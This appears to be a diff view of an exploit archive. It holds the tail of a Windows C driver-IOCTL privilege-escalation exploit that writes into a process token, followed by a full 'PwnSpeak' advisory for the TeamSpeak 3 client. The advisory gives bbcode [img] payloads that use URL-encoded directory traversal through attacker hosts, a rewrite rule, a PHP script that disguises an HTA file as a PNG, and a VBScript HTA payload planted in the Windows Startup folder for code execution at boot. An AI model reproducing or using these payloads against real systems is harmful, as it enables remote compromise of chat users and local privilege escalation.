if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
|
||||
DebugBreak();
|
||||
|
||||
void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
|
||||
|
||||
CloseHandle(token);
|
||||
|
||||
// i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
|
||||
HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
|
||||
if(hDriver!=INVALID_HANDLE_VALUE)
|
||||
{
|
||||
fprintf(stderr," Open Driver OK\n");
|
||||
|
||||
if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
|
||||
{
|
||||
fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
|
||||
return;
|
||||
}
|
||||
else fprintf(stderr," Send IOCTL OK\n");
|
||||
}
|
||||
|
||||
else
|
||||
{
|
||||
fprintf(stderr," Open Driver error %d.\n",GetLastError());
|
||||
return;
|
||||
}
|
||||
|
||||
|
||||
CloseHandle(hDriver);
|
||||
getchar();
|
||||
|
||||
}
|
132
platforms/windows/remote/38513.txt
Executable file
132
platforms/windows/remote/38513.txt
Executable file
|
@ -0,0 +1,132 @@
|
|||
Exploit Title: "PwnSpeak" a 0day Exploit for TeamSpeak Client <= 3.0.18.1 RFI to RCE
|
||||
Date: 12/10/2015
|
||||
Author: Scurippio <scurippio@anche.no> / (0x6FB30B11 my pgp keyid)
|
||||
Vendor Homepage: https://www.teamspeak.com/
|
||||
Application: TeamSpeak 3
|
||||
Version: TeamSpeak3 Client 3.0.0 - 3.0.18.1
|
||||
Platforms: Windows, Mac OS X and Linux
|
||||
Exploitation: Remote
|
||||
Risk : Very High
|
||||
|
||||
=========
|
||||
The Bug
|
||||
=========
|
||||
|
||||
The bug is a simple but Critical RFI(Remote File Inclusion), and in my test case on "Windows" you can reach remote code execution.
|
||||
By changing the channel description you can insert a [img] bb tag with malicious content.
|
||||
|
||||
There are a few problems with the image caching on disk.
|
||||
|
||||
1: There is no check on file extension.
|
||||
|
||||
2: There is no file renaming, and you can fake the extension so you can create in the cache a malicious executable file like hta, scr, msi, pif, vbs etc.
|
||||
|
||||
Example:
|
||||
|
||||
[img] http://yourevilhost.com/thefile.hta [/img]
|
||||
[img] http://yourevilhost.com/thefile.msi [/img]
|
||||
[img] http://yourevilhost.com/thefile.vbs [/img]
|
||||
...
|
||||
|
||||
3: Teamspeak 3 Client saves the image and recreates the same directory structure as the server where it's hosted.
|
||||
|
||||
Example:
|
||||
|
||||
C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.hta
|
||||
C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.msi
|
||||
C:\Users\YourUser\AppData\Roaming\TS3Client\cache\remote\yourevilhost.com\thefile.vbs
|
||||
...
|
||||
|
||||
4: It is possible to do a Directory Traversal with a simple urlencode of the traversal path bypassing the built-in control.
|
||||
This is the critical hole, if you combine the previous vulnerabilities you can save a malicious file in any path on the OS with the same permissions as Teamspeak client.
|
||||
|
||||
Example:
|
||||
|
||||
[img]http://evildomain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDesktop%5cOwnedByNonnOreste.hta[/img]
|
||||
|
||||
If you set this bbcode on a channel description every user that sees it will download a file named "OwnedByNonnOreste.hta" on their Desktop with 0byte, you can also put images or other file extension!
|
||||
|
||||
The built-in image fetcher in the Teamspeak client checks the content type and the file header to check if the response is a real image, but you can easily bypass this control and put your exploit payload.
|
||||
|
||||
==========================================
|
||||
Bypass / Vector / Payload
|
||||
==========================================
|
||||
To bypass the control and put arbitrary data in your malicious file you only need a web server and you can easily set the Rewrite rule for the Exploitation.
|
||||
|
||||
Example:
|
||||
|
||||
RewriteEngine On
|
||||
RewriteCond %{REQUEST_URI} !/faker.php
|
||||
RewriteRule .* /faker.php
|
||||
|
||||
Then you need to write a simple php script to fake the payload as a png by sending the right content type and file header.
|
||||
|
||||
Example:
|
||||
|
||||
<?php
|
||||
header ('Content-type: image/png');
|
||||
echo "\211PNG\r\n\032\n";
|
||||
?>
|
||||
<html>
|
||||
<head>
|
||||
<title>PWN3D</title>
|
||||
<HTA:APPLICATION
|
||||
APPLICATIONNAME="OwnedByScurippio"
|
||||
ID="SnappySnappySna"
|
||||
VERSION="1.0"/>
|
||||
|
||||
<script language="VBScript">
|
||||
|
||||
Sub RunProgram
|
||||
Set objShell = CreateObject("Wscript.Shell")
|
||||
objShell.Run "calc.exe"
|
||||
End Sub
|
||||
RunProgram
|
||||
</script>
|
||||
</head>
|
||||
</html>
|
||||
|
||||
If you save the file in the windows startup directory you can achieve a remote code execution.
|
||||
|
||||
Example:
|
||||
|
||||
[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
|
||||
[img]http://example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cWelcomeAndOwnedByNonnOreste.hta[/img]
|
||||
|
||||
The HTA file is a prefect vector for this exploit, you can execute trusted vb script (shell command or anything else) and the png header doesn't compromise the markup language syntax.
|
||||
At the next OS boot the victim will execute the malicious HTA file.
|
||||
|
||||
=======
|
||||
Fix
|
||||
=======
|
||||
|
||||
Update to beta channel or wait the 3.0.18.2 hotfix for this exploit!
|
||||
|
||||
======
|
||||
Info
|
||||
======
|
||||
|
||||
10/20/2015 - I have reported this Vulnerability to Teamspeak developers team
|
||||
|
||||
********* - Release the public exploit
|
||||
|
||||
- Fuck the 'Captatori' - Tracciabili
|
||||
|
||||
(Snappy is always with you :P )
|
||||
|
||||
|
||||
Copyright (c) 2015 Scurippio
|
||||
|
||||
Permission is granted for the redistribution of this alert
|
||||
electronically. It may not be edited in any way without mine express
|
||||
written consent. If you wish to reprint the whole or any
|
||||
part of this alert in any other medium other than electronically,
|
||||
please email me for permission.
|
||||
|
||||
Disclaimer: The information in the advisory is believed to be accurate
|
||||
at the time of publishing based on currently available information. Use
|
||||
of the information constitutes acceptance for use in an AS IS condition.
|
||||
There are no warranties with regard to this information. Neither the
|
||||
author nor the publisher accepts any liability for any direct, indirect,
|
||||
or consequential loss or damage arising from use of, or reliance on,
|
||||
this information.
|
Loading…
Add table
Reference in a new issue